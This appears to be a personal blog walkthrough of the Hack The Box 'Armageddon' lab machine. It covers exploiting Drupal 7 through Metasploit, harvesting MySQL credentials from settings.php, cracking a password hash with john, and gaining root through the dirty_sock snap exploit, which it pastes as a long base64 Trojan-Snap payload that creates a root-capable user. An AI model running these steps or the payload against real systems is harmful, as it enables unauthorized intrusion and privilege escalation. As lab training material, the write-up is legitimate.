Armageddon From Hack The Box

 

Hello everyone, welcome to my second blog. In this blog I'm gonna show you how to get root for armageddon machine which is a easy machine from Hack The Box, done by Bertolis.

Lets begin,

Lets start with nmap scan

 So there are only 2 ports open

1) 22 : SSH

2) 80 : HTTP

Since we have an open HTTP port lets add our target machine to our /etc/hosts file and start enumerating.

Now after a lot of enumeration on the website I got nothing then I went to search what server and what CMS inlcuding its version, this website is using using wappalyzer. We can also find what CMS and what version, it is using from the source code.

This website is using Drupal CMS version: 7

After knowing the Drupal version lets recon for any known vulnerabilities.

After some time looking for exploits in google I finally found the correct exploit in rapid7. And yes we will be doing this machine using Metasploit. After some time I will post how to do this machine without using Metasploit.

 

Let's fire up our msf console and get our lo privilege shell.

Lets set LHOST , RHOST and run the exploit.

 

Where LHOST is Attacker Machine (Your Machine) IP Address. RHOST is Victim Machine (Armageddon Machine) IP Address. Now after updating LHOST and RHOST run the exploit to get our shell.

And then boom we got our shell. Now lets enumerate this shell. This is not a full interactive shell. And we can't change directory to home and list users. After some time on looking each and every file and directory on /var/www/html directory I got mysql username and password on /var/www/html/sites/default/settings.php

 

MYSQL credentials:

Username : drupaluser

Password : CQHEy@9M*m23gBVj

Lets login to mysql using the above creds.

But the problem is it is showing error when we login directly using username and password. So we need to use other commands of mysql to look what is inside database.

Lets go to shell and type the below commands to get password hash for the 2nd user.

So now we have 5 Databases. And lets see what tables we have in drupal.

We have users table in drupal database now lets get password hashes from users table.

We have found a password hash for brucetherealadmin user. Lets use john tool and crack the hash.

Command : john <hash-file> -w=/usr/share/wordlists/rockyou.txt

Now we got password for brucetherealadmin user.

Credentials : 

Username : brucetherealadmin

Password : booboo

Now lets ssh using these credentials.

We are now brucetherealadmin user now.

Get user.txt flag from /home/brucetherealadmin directory.

Now Privilege Escalation part:

lets list what sudo properties can it run.

Command : sudo -l

Brucetherealadmin can install snap using sudo.

Lets google if we can use snap to do privilege escalation.

I found some resources on google which helped me getting privilege escalation.

1) Snap Exploit

2) Privilege Escalation using snap

The 2nd link helps you more on understanding about privilege escalation using snap. And the 1st link helps in exploiting.

The python script is not working but after some time I figured it out. We just need to copy the Trojan-Snap from the exploit which is base64 encoded. We decode it and save it as <file-name>.snap. Once we did it we can install our snap file and get root shell.

Command : python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSA[64/137$
kc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFM
TCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZ
DY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAA
AAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAA
AAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > lol.snap

copy and paste the above code in victim machine /tmp directory.

Once you create the snap file type the following commands.

Command : sudo /usr/bin/snap install --devmode <filename>.snap(In my case I named my file as lol.snap)

Once the dirty_sock is installed it will create dirty_sock user with root privileges.

Lets su to dirty_sock user.

And there we go, we are root now. 

You can get root.txt from /root directory.

The privilege escalation part was not that easy as it looks. But the machine is very awesome and I learnt may new things. Great job by bertolis.

Note: If you can't su to dirty_sock user then try to reset the machine.

Thank you for reading my blog.